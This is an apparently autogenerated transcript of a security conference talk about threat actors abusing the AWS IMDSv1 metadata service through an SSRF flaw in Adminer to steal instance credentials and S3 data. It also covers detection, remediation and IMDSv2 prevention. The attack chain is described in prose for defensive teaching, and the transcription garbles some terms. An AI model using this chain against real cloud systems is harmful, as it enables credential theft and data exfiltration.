Transcript
This transcript was autogenerated. To make changes, submit a PR.
I always say it's hard to follow a tough act, but no
act is tougher than lunch. But I'll do my best.
And one thing is we want to make sure that as any speaker,
you're leaving this session with a new nugget
of information nation a little bit about today's
talk. We're going to be talking about cloud metadata service
and the abuses. We're seeing it on the front lines from different threat actors
and we're going to really particularly speak on a particular use case.
So quick little we'll give us some small introductions of ourselves,
a little overview of what is the instance metadata service.
We're going to actually talk about that across the three major cloud
platforms, AWS, GCP and Azure. But then we're
going to really focus on AWS towards the end. We're going to then speak a
little bit about the threat landscape. So what is happening that
we're seeing that are being abused by threat actors or
can be abused by threat actors around the cloud metadata.
And then we're going to get into the specific use
case where we saw threat actors able to
abuse this at a large grand scale and kind of go
through the timeline of the attack. And then towards the
end we're going to do a demo of exactly
what the threat actors did and utilized in order to perform
this attack. And then we're going to be doing this
detections, how to detect this in your environment, how to
remediate, how to prevent. And then we're going
to finally do that same demo to show that the prevention techniques was
able to successfully block the specific attack.
And we try to plan ahead.
We made sure the demo gods isn't always working in people's favor.
So what we did, we had video demos which we'll be talking through it
as always. This is more of a housekeeping item. The case
studies and examples that we're going to be talking about is really
around just various different attacks and things that we've
seen on the front lines that are public knowledge and just through from our
proactive type engagements. There's not one specific client we're
speaking of just because we want to obfuscate as
much to try to keep our clients confidentiality intact.
So a little bit about myself. I'm Nader Zaveri.
I'm a senior manager within Mandian, specifically part of
our security transformational services practice. Say that
three times fast, I dare you. It's a very unique practice though.
So within Mandiant as we know, we have the
incident response services which is our foremost
service that we provide, we're the containment remediation arm
during an incident. So as investigators, as Brandon
and his team are investigating, we're there to help plug the holds
that the attackers were able to utilize and also help remediate
additional holds and gaps that maybe the attacker may try to pivot.
Another facet of what we do here at STS
is proactive engagements. So throughout the talk, you're going to hear
me talk about things that I've seen from the front lines as well as organizations
that are being proactive. They want to be able to test and assess
their cloud environment. So they call us and we perform proactive
engagements and assessments across their environment, regardless of
the cloud platform.
And my name is Brandon Sean Ruffer. I am a principal consultant
with Mandiant services team, focusing on incident response
and digital forensics. My focus is similar
to Nader in know when an incident occurs.
We're those individuals that are in the front lines responding to breaches
as well as performing some of the behind the scenes activities
where it comes to actually what occurred and recreating
and following the breadcrumbs to the overall incident.
I have a degree in digital forensics
as well as I've responded to both many
ransomware and nation state threat actors as well over the years.
I as well provide with my
free time as well, or the lack thereof,
other industry advisory to other organizations,
and I am an instructor for our incident
response and other related course content.
I also manage a team of individuals in
our San Francisco office, but I recently moved to Arizona and
it's been an interesting transition between just the
general teams at mandiant.
Awesome. So first, before we kind of break into
exactly what happened, we want to kind of level set the terminologies.
When we're talking about instance metadata service, what do we mean?
What is instance metadata? What is it related to AWS?
But really this is across cloud platforms. One thing is
it provides critical information. So if you have a
virtual machine that's in the cloud or EC, two instance,
in this case with AWS, it's a
set up to be a non routable link, local IP
address, 169254 or 169254,
you could do a simple crow command, and it provides
critical information for the operating system,
IP address, what subnet they're in, what availability zone,
some of the key things that an application may
need. So sometimes a developer needs this to be able to provide
critical information. But also you can supply
certain scripts, like startup scripts within the user data
to be able to have the virtual machine run. And one
of the things is this is across really cloud platforms and
we're speaking a little bit more deeply on AWS,
but Azure has its instance metadata service as well
as GCP.
Now we know a little bit about what is the instance metadata service.
Why do we care? So we will be talking a
little bit more on instance AWS, instance metadata service
version one versus version two.
One thing is this is not a vulnerability. It is a misconfiguration.
So it's not going to be caught by normal vulnerability scanners.
This is a misconfiguration. It is meant
to be like this for a certain time. And one thing
is just anecdotally and I'm glad this just came
out about a week and a half ago by datadog where
they went and scoured their 600
plus organizations and the specific
misconfiguration which is version one. And we'll talk a little bit about what
happens in version one versus version two. This 93%
of EC two instances had
this misconfiguration and 95% of
organizations across their span of 600 plus organizations
had at least one or more instances. And this
is something that anecdotally I can kind of speak to just from doing hundreds
of IRS and proactive assessments. This is
a common finding we see across
the different AWS environments that we see is
this specific configuration is turned on.
It's not turned off by default, it's turned on by
default. Imds v one. And when you run a specific
configuration within an EC two, for example,
you'll see the HTTP token
set to optional. We will talk about what happens when you set it to required
and what it stops. One thing is
this is not something new, right? The IMDSv one abuse
that happened is not something new. This happened at Capital one breach,
the very infamous Capital one breach that we are all well aware
of. The threat actors utilized this
attack in 2019 and by December or November,
December time period, AWS in 2019 was able to create the
version two. It's not turned off by default.
So majority of organizations that we've seen still have this
misconfiguration. One thing as I mentioned is
as this instance metadata service is being utilized,
there are things like a user data script you can load as
you load an EC two instance similar to if you recall
in your Windows days, right? There's a log on script that can allow for
mapping of drives and a lot of times those
user data scripts and what we've seen just through our various
different IRS, they have clear text passwords.
If you have a password and they're utilizing Powershell or
Bash, you can see the password in clear text.
So if a threat actor has the ability to query this
from the outside, or have the ability to get access
to the EC two instance, if they were to query the user data scripts
within the instance metadata service, they'll be able to obtain those passwords.
And once this problem of this misconfiguration
gets really exacerbated, once you see a vulnerable
application that has a SSRF,
an SSRF vulnerability that will then take this misconfiguration and
really expand it out even further because
of the ability to query it from the outside. And Brandon will
kind of talk about a little bit about what exactly we saw and how
a threat actors was able to utilize this and be able to query
and things from the outside without it being inside
the actual instance. Because remember, this is a link local
IP address, it's non routable.
Only way that this can happen from the outside is through an
SSRF vulnerability.
And one thing we really wanted to discuss, and one of the reasons why once
this came up, we went through the whole process and we realized
that this may be, and we talked internally through threat intel.
I talked to various contacts in other cloud security communities, and this
may have been the first time we've seen a threat actors take
a misconfiguration, specific misconfiguration,
across an entire set of IP cider
ranges against a cloud provider. So they had a misconfiguration,
they knew they had an SSRF vulnerable application,
and they essentially sprayed and prayed across a set.
I think we have over 2100 ips. They were spraying
this specific threat actor. And Brandon
will talk a little bit more about what exactly we saw from a forensic standpoint
and what exactly happened.
Great, thanks Nader. Yeah, definitely. This is pretty unique
in general across the board that we've seen a threat actors
target really all IP ranges related to
a hosted infrastructure, in particular to AWS.
We've seen the threat actors as well scan other resources for other
similar misconfigurations and other cloud hosted
services. We'll definitely talk through some of those. But in particular,
definitely cloud hosted services are a rather
attractive target for similar threat actors.
Just in general, because of the proliferation of
cloud hosted resources and the available information,
including things like configurations and other topology,
and most predominantly in this particular case, credential information
that was leveraged to further the attack that
they were able to carry out. We will cover kind of a
demo of what we saw in this particular case,
but related to the actual infrastructure, this was especially
challenging because the number and amount of log data that was actually
recorded was rather minimal in comparison to
other locally hosted platforms or things
that in general would have
more verbose logging out of the box.
The other thing in particular we saw of UNC two
nine three was obviously exploitation
and targeting of other services and other applications
that were hosted in the AWS IP address range
space, and then further abuse of IMDSv one.
And as Nader had mentioned, not only is this
a misconfiguration, but the fact that it's on hosted infrastructure in
the cloud makes it easy to identify external applications that
if a CVE is released to obtain information to
further an attack, or things like remote code execution
to obtain temporary access keys and credentials.
The other thing as well is in this particular case it was very
limited to a single system that had been inadvertently
open to the Internet. However,
similarly with the roles that are assigned to VMS,
sometimes there's just configurations which allow
a role not only on one vm but multiple vms.
So narrowing down where credential
exposure might have occurred gets definitely more complicated
as there are other access rules and keys that share the same permissions
that might have access to a particular s
three bucket or some other resource that has or is used to store data.
And as I had said, activity expands over all
industry verticals for a cloud hosting platform. So this isn't limited
to just AWS, but there are existing and similar
threats in AWS GCP
as well as Azure that host similar metadata services.
Yeah, and one thing to kind of note, and I think Brandon had mentioned
this, we aren't specifically talking about the
CVE, the vulnerability that the threat actors utilized,
which they did utilize a vulnerability in SSR, vulnerability within an
application, because we're trying to nip it at the bud
where if we patch this one application,
a new SSRF will come about. We're looking at specifically the misconfiguration
of this metadata service and focusing on that because that is
at the root of the problem where if you'll see during
our talk, when we are going through the remediation
methods, you will see us be able to remediate
and turn on the IMDs version two and be able to stop
this type of attack. So this is why our talk is really focusing
mainly on the misconfiguration,
the setting, as opposed to just a CVE,
because this CVE is here today, another one's going
to be here tomorrow, and really trying to focus on how to
remediate this head on.
And as we mentioned, we're going to focus a little bit on AWS, but across
different platforms. Like Azure has its metadata
service. Azure does it very well, specifically because they require
the metadata service tag to be
added during the packet. But also anytime they
have something like an X forwarded four message, they will automatically
reject it. The X forwarded four is really key because it will talk about
if something is coming from a relay server or proxy,
it will then automatically block it and it requires
an Oauth token to be had in
order for you to query the metadata service. But even
then, there are some great articles around how you
cloud use Azure managed identities as
a way to abuse and proliferate.
And there's some great articles from Carl and Marius around
different ways of using Azure managed identities and being able to abuse
Azure. Utilizing the metadata service with
Google Cloud is similar. As I mentioned, they require
a header, a metadata flavor. The header must
have the metadata flavor. Google as well as they block
exported four messages. So they do that same thing.
But this wasn't always the case. The older versions,
version zero one or v one beta one back
maybe a few years back, that allowed and that didn't require that
header to be there, which then allowed for, let's say a similar
type of attack, an SSRF type attack to occur, but that is
no longer supported. So now it's only a version one, which then blocks
the capability. But even then, as I mentioned, there's ways you could
query the metadata service once you do have access to
the easy two instance to be able to get
all the metadata, sometimes add SSH keys at the project
level, which some of the articles that talked
about this where Matiga recently did this, as well as
Ancat, which is a great website for a lot of cloud
pen testing, talks about this as well. How you could query
the metadata, get your SSh keys and put it at the project level
and not just at the instance level. The whole
point is we want to show that this cloud metadata abuse can occur
across cloud platforms. But this specific case,
because of the header not
requiring the exported four, allows for
the proliferation and to make this as large
of a scope as possible.
One thing that was notable as well is how
long similar metadata services existed.
And I think Nader had given an example of
even GCP has some available configurations
for using metadata since back in 2017 and
then some other people that have attempted to abuse
that, even if it's in a testing form.
Similarly, the other example Nader had given was
the capital one event where there obviously
was the usage of similar metadata services and abuse of related credentialing
and then more recently in
February of 2021, we had basically a
database management software CVE that
was originally announced. And then
for this particular version of the database software
called Adminer, it allowed basically the
usage of a server side request forgery,
which then the threat actors kind of chained that for usage.
And with the understanding of the metadata services
existing in AWS cloud, they were able to
obtain a proof of concept code which was subsequently
released, and then the proof
of concept. Essentially we have circumstantial
evidence that that proof of concept was utilized to then perform
this particular attack that also was available pretty quickly
using various open source and Google searches is
easy enough to find the CVE and then abuse that
across the platform. Within three months,
we saw basically the usage of this
particular CVE along with the proof of concept, which will give you
a demo to automate the identification
of vulnerable versions of the admin or software on the web
platform itself. We saw then subsequently
the retrieval of the EC
two instance roles, and then
the acquisition of the credential to subsequently
use in the attack. From there they
utilize the key credential to log into the
AWS command line, conduct reconnaissance of the available
data in the s three bucket that the keys had credentials with, and then
perform data theft from the available bucket.
The thing that's interesting with that as well is
once they obtained the keys and the temporary access credentials,
that was when some of the alerting went off, which we'll talk to that in
a later slide. But in general, the threat
actors in this particular case, not only from the
initial release of the proof of concept,
but even on the date of June,
we saw the reconnaissance and then data theft, I believe within
3 hours of the attack itself. So moving rather
quickly. Yeah, so that's a great point where as soon
as they were able to obtain credentials, we saw them right in the
environment fairly quickly. And another thing I think to mention,
as I mentioned a few times, is this is one CVE
that was created, the POC was out there. And that's one
thing is it's only so much you could be ahead of on vulnerabilities.
I have just a little story where a
vulnerability was disclosed October
21. Seven days later, a POC,
a proof of concept, came out on the Internet, the 27th.
By the 20 eigth, that client that we were doing,
the IR, was breached with that same proof of concept.
So it's only so much you can be ahead of these vulnerabilities.
This is why we really want to focus on the configurations and settings and
one thing. I will say just from a suggestion, when you are doing your vulnerability
scanning, you're seeing just a lot of vulnerabilities that
come out based off of whatever nessus scan or
other vulnerability scanning software that you're utilizing.
One thing to help prioritize it is if a POC is out there,
if a proof of concept has been published, that is something you want
to definitely get ahead of and try to patch that right away. And you'll
notice as well, Cisa doesn't always
publish bulletins for every vulnerability
out there. But once you see a proof of concept that's out there, that is
something that's Internet accessible, you'll see a bulletin come out right away
for that. So just trying to help with staying
on top of your threat and vulnerability management is trying to figure
out if those are out there. That is any script
kitty who can get on a GitHub and utilize which we have
some circumstantial evidence that the POC that was utilized
was the same one that was found in
this particular case. The way that the demo is going to work
is very similar to what we believe the threat actors had performed
prior to this stage leading up to what we're going
to show in the demo. Basically, we saw the threat actors scan
the web application and then subsequently
perform the attack. The fact that the infrastructure was
hosted in AWS obviously is one of the key
factors in this particular case. But in
general, across our client base, once we were able to obtain some of the IP
addresses that we identified as related to the threat actors activity,
we saw that there were other similar characteristics
where our threat intelligence team was able to match on, I believe on 2100
IP addresses that had scanned for similar vulnerabilities around
the same time. So kind of an interesting tidbit of information there.
But the way that the attack works is somewhat
counterintuitive from an investigative standpoint mainly as well,
because there is not really command and control traffic,
but there's an operational relay box which is essentially
the attacker's command and control system.
The proof of concept code that was released.
What they ended up doing was running that on their local system and
then navigating to the vulnerable admin or page.
We'll show you the demo of this in a couple of seconds here. But once
they navigated to the admin or page and had the code running on their own
box, they typed in the IP address import,
subsequently returned the credentials there shown
in step three. Once they had the credentials themselves,
they basically no longer needed the infrastructure hosted on their command and control
operational relay box, and they also didn't
need access to the front end of the application anymore. They were able to log
in, utilize the keys, and then exfiltrate the
data from the s three bucket itself. So pretty quick
attack, and I believe in the upcoming slide,
we have a quick demo. Yes. So we're going to do the demo with,
of course, IMD's v one enabled. So we're going to walk through this demo
with the infrastructure in place that kind of mirrors what we saw the
attacker utilize. And you'll see very quickly, as mentioned with
the admin or tool, all they needed was an IP
address and a port, and they didn't need a
username, didn't need a password. And you'll see access keys and secret access
keys to that Ec two instance. And so
what you'll see is the script that we're going
to run includes a parameter for the port as well as the URI
for the metadata service itself.
Subsequently, we change the IP address to our
attacker's operational relay box, which is the local system in this particular
case, appended by the port, we change the setting for elasticsearch,
hit the login button, and then the credentials are returned to the screen.
So a very simple attack in theory,
but from an investigative standpoint, it's very challenging to
acquire actual relevant data that records
the actual happening of this. So in general, I have some
commands there to pipe in what the keys and tokens are and
then perform the actual reconnaissance for the buckets and
then download the content. But that's really at
a high level. What it includes you'll see on the web server as well.
The system itself that you type in the IP address.
The Amazon Web services is appended by the admin again
within the vulnerable version, reaching back out as a result of the server
side request forgery back to the command and control operational
relay box hosting the script itself. So in general,
once you obtain the IAM role, it includes
the key and credential information. You can change some of
the settings to actually obtain all of the list of available
roles and then subsequently utilize that
for the attack itself. And so
now that we know what happened with IMD's V one,
as I mentioned, Amazon came
out with IMDs version two back in November
of 2019 and went to
the reinvent and they went live. But we,
as we just saw from that data, as well as just anecdotally,
we see this in almost every environment.
So what is different with IMD's version two than version
one? Version two, it's now a session based protocol,
a session based model where you have, instead of starting
with the get request, you put a put request to obtain a token,
and then from that token you could then start querying the
metadata service. If it was coming from a relay box
it would fail because it requires that X forwarded
four to not be there. If it sees a packet with an
X forwarded four there, it will block it.
And it does require the attribute and the header
to have metadata service. They've also added cloud
watch metrics. So if the metadata service is being utilized
and version one, you'll be able to get that. And I'll talk a little
bit about the different detection techniques internally of
how you can be able to see it, as well as some open source
tools to just verify if you have an organization that runs AWS.
One thing to do today or Monday is to
check out your AwS EC two instances.
Some of the native services that you could utilize. There's a native
services as AWS security hub. They have its own
detection now that allows you to see if
an EC two instance has an IMDS version one
enabled. There's specific cloud watch metrics. As I mentioned,
if IMDs version one is enabled on an EC two instance or is being
utilized, they'll be able to do that as well as a config rule.
You can utilize a config rule to be able to do remediation.
There's open source tools out there. So I am one, I'm a
big proponent especially of the security community to not
only utilize native services, but if you need to utilize open source
tools, get great open source tools and reputable open
source tools like Prowler or Metabadger, which is
a tool just dedicated to be able to
remediate and take away and discover and remediate
imds version one. Vulnerable systems there.
And of course there's cloud mapper made by
a great kind of cloud security guys and some of our cloud security personnel.
And there's always ways to discover just purely through the AWS command
line interface, you could utilize it and be able to query.
And when you're going through the query of a describe EC two
describe instance, you'll be able to see where we're
going to talk about in a little bit. Was the HTTP token being
set to optional in the beginning? And once we set it to required,
you will see the difference in the oats comes out.
So a little bit about the detection.
So in general, this particular type of
attack is pretty challenging to investigate, although as
quick as we were able to demonstrate the actual event.
It really doesn't have too many logs that were generated
in a couple of events that we've had that were similar.
The main thing that we had to kind of key us on as to whether
or not exfiltration had occurred of either the credential itself
or the bucket itself are related to guard
duty, which in some of our testing
we found that either the data has already been taken and there's
been an alert, or the key itself, the credential
from the role basically has been taken.
You'll see that there's really two primary alerts for the credential
theft itself. One is the instance credential exfiltration
and then instance credential exfiltration outside, either inside
or outside of the AWS environment itself.
In particular, it is incredibly challenging to
figure out in some cases what the alert means because
the metadata services themselves, at least for AWS, is rather
sparse and limited. The reason being,
I guess in general is some logging which shows the usage
subsequently of the credential maliciously. But in
general the instance metadata service, because of the way that
it uses the link local address, the actual, there's not
like an HTTP log which records illegitimate
or even legitimate requests for the tokens
themselves. So because of the
server side request forgery and the system querying the metadata
service as if it were a local system,
there's limited data that's recorded by the
actual metadata service. And I don't believe there's anything that
really can increase the verbosity of the logging
for the metadata piece itself.
The other thing that was challenging was the available VPC
flow logs. What we had seen was once the threat
actors performed this particular attack, we saw kind of
an anomaly in the network traffic where we saw the web request which looked failed.
And I'll explain that in a couple of seconds. But from the failure
in the web log itself, we saw traffic outbound
from the EC two instance, which was an anomaly
because we were like why is the EC two instance reaching out
to the Internet? So in the logs
we ended up seeing 302 redirect and a 403
error message. That as an investigator kind
of threw us off as to why the application was erroring out
because you would assume that would be a failure,
but the failures were relevant. Matching that up from
a timeline perspective with the VPC flow logs because we were able
to see the outbound traffic which
we were able to make some conclusions based on the web request itself
which included an unknown IP address and a port number,
plus the VPC flow logs outbound that there was something else going on
from a vulnerability standpoint. And then subsequently
the timing aligned very well with the object level access logs
and data events where we could see the copying of the data
using the AWS command line in subsequent actions.
And I think one thing to mention, I think Brandon had talked about this is
there's a delay that happens from the time of exfiltration
before the alert. We're using demo size time
of small type of data exfiltration but
there is just a delay in general. And also it's an
alert, right? It's not a prevention. And actually just came out
yesterday is if you utilize AWS,
detective, it now can group your guard
duty alerts and your VPC flow logs that just came out last night.
I think I just tweeted about that. I'm not just trying to drop my twitter.
I was for real. It did just come out last night where you can now
group your guard duty alerts with your VPC flow logs and
stack them up for easier triaging. And that just came out with detective
last night. So there's strides that are happening from
the AWS standpoint. But one thing is,
okay, we've discovered it, we've detected it, how can we
remediate it? There's a few ways to remediate.
Do you even need this instance metadata service?
There's many times and majority of the time you don't
need the instance metadata service unless your application or
your team needs it for a specific reason. From getting
the IP address, the availability zone,
the subnet, you can disable that entire instance
metadata service at once. As you're
going through the EC two metadata option,
you put an HTTP endpoint,
put false or disabled and you'll be able to block
the ability for even anyone to utilize that if
it's needed. Right? So you talk to your team, they've said no, we need
this because we can do X, Y and Z. You can then require who
can utilize it. You can put it at the IP table where you
can say only Bob can query this specific IP
address and you
can block it like that. And you can also just utilize
open source tools. If you've talked to your team and realize we don't really need
this at all, let's just go through the entire list,
litany of lists. There's ways that utilize this from open
source tools. Metabadger is another one I talked about already. Open source
tool that goes through all your instances, discovers them. If they
are, you can remediate them in a single stroke. So now we've remediated
it, how can we prevent it from happening again? So we
want to make sure after we're done remediating, I don't want to talk about IMDs
v one again because it's just not something I, as an
information security officer, want to consistently worry about.
You can do it in many different ways. There's SCP
service control policies where you can say only those
that have EC two instances that are version two
can query can be in our
environment. So you can only limit your environment to EC two
version, IMds version two.
So if you were to create an EC two instance with version
one and not putting the disabled,
not putting the disabled function, it will
not allow you to create that EC two instance. There's infrastructure
as code methodologies, right? If you are not doing it through the
console, and the true method we want to do is
always push infrastructure as code. We don't want to have a lot of people having
their hands in the cookie jar in terms of being able to make modifications
to your environment. You utilize infrastructure as code, cloud formation,
terraform, there's terraform techniques and cloud formation techniques
to be able to block it. And then you could utilize in local IAM police,
if you have one AWS account, not using AWS organizations,
you don't want to use scps. You could utilize it where you can
block the ability from users launching any EC two instance
that does not have version two required and
some additional prevention techniques. So let's say you have to have it. We have to
have Bob who has the ability to query it.
There's ways that you want to still harden it. As I mentioned, user data scripts,
that launching script that happens initially when an EC two instance
is created and launched,
there's a user data script. You want to make sure you're going through those scripts
and ensuring there's no clear text passwords, there's open source tools
that can catch it, like Scout suite that can catch that for you.
You want to limit the number of HTTP hops,
so it's not going through a relay server. You can limit it to one.
You can go from one all the way to 64, but you
can say, I only want it to go through one hop, so it's not going
through, let's say a relay server that may have caused
this to happen. And you can limit who can
utilize it, as I mentioned, just through an IM policy.
And then also who can modify the IMDs
version one and two. You could do that at the IAM level as well.
So demo number two, we're going to see, we turned it
on, we did some magic in the back, we turned it on. Now version
two is enabled and Brandon's going to walk through what happens after
that. So very similarly,
running the command to include the port number as
well as the metadata service itself on the
operational relay box. Once that
runs, it's operational on the actual system itself,
change the setting to elasticsearch and then change the
source import ip address. And basically
it errors out instead of returns the credentials to the screen.
That's because the put request, there's two pieces obviously
once IMDs V two has to be enabled. One is the put request to
basically authorize the request and then an additional request to obtain the
credentials themselves. And in
general, this is kind of the mitigation, at least if
there are Internet facing systems or similar infrastructure
set up in AWS, at least one way to remediate
the overall event. Awesome.
So as you can see, it's unauthorized. For one unauthorized attempt,
as Brandon mentioned, it requires a put request to get the session token to
then be able to query. Because this doesn't have that,
it's a relay box, it doesn't truly have access internally to the
easy to instance. We aren't able to get that.
So really action item for everyone at the end of this session is
go to your teams. If you have an AWS instance, if you
have AWS in your environment, ensure and say do we have
any IMDs version one enabled? I don't know.
Then here's a few things. And actually it goes straight into our
next slide. We actually put out a blog a few months back with
the help of some others within our team and threat intel,
where we walk through the entire process of the threat actors, but also
the specific mitigations. It's about ten plus pages
of detection techniques, prevention mitigations
and remediate techniques. So go to your teams.
Say if we have IMDSv one enabled, I want to know how many do
we have and do we need it or not? And be able
to remediate that as soon as possible. And that
concludes our session. If there's any questions.
I guess one more closing thought is as
well, depending on the actual vulnerability
scanner or anything like that, there's obviously not a vulnerability,
it's a misconfiguration, which is one of the key pieces I think we're trying
to get the teams to take away with them in
that there might be something that is low priority
or low risk if it's an internal system or might not
necessarily have Internet accessibility, but that paired with the fact that there was
a vulnerability on this server makes this
a little bit more of a challenge to not only respond to,
but to figure out how to remediate and make
the system hardened and more secure because the attack
itself is rather simple and was carried out rather rapidly.
And unfortunately there's a couple of clients that ended up in
a similar boat where it was too late when there was an identification
after the exfiltration had occurred. Yes, that's a great
point. A vulnerability scanner will not catch this.
This is where you need to expand your vulnerability scanners to have something like an
attack service management where it can catch things that are major misconfigurations
that they see from the outside. To be able to catch something like
an ASM that could be able to catch these misconfigurations and
be able to notify the team that you do have
EC. Two instances that have version one enabled. Great point,
Robert. All right, thank you guys.
That was great. If you guys have any questions for Brandon
or Nader, they will be outside those doors to
my right, your left in about 5 minutes and they'll be
there for about ten or 15 minutes. If you want to chat,
we'll be back here at 245, I believe so, in about
15 minutes. Give it up again for Brandon Nader.
Thank you.